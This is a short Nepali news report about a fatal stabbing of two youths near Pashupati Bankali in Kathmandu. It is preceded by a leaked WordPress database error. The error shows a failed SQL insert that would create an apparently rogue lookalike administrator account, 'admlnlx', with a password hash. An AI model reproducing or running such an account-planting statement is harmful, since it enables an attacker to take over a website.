WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BQ4ivxfQBrWwU0xKSGKXhtrORz4VyT0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-03 14:56:19', '', 'admlnlx', 'admlnlx')
काठमाडौं, पुस ७ –
पशुपति वनकाली क्षेत्रमा चक्कु हानेर युवकको मृत्यु भएको छ भने अर्का एक घाइते भएका छन् ।
बुधबार साँझ युवाहरुको समूहले झगडाका क्रममा सोनाम तामाङ र विजय गुरुङमाथि चक्कु प्रहार भएको थियो । घटनामा घाइते भएका १९ वर्षीय सोनामको उपचारका क्रममा केएमसी अस्पताल सिनामंगलमा मृत्यु भएको प्रहरीले जनाएको छ ।
सुनसरी धरानका उनी बालाजुमा बस्दै आएका थिए । घटनामा १८ वर्षका विजय गुरुङ घाइते भएका छन् ।
उनको टाउको र कोखमा चोट लागेको छ र अवस्था गम्भीर रहेको चिकित्सकहरुले बताएका छन् ।
प्रहरीका अनुसार सोनाम र विजयको समूहले कुटेका युवाहरुले बदला भावले उनीहरुमाथि चक्कु हानेका थिए । घटनामा संलग्न भएकाहरुको खोजी भइरहेको गौशला प्रहरीका डीएसपी नवराज कार्कीले बताए ।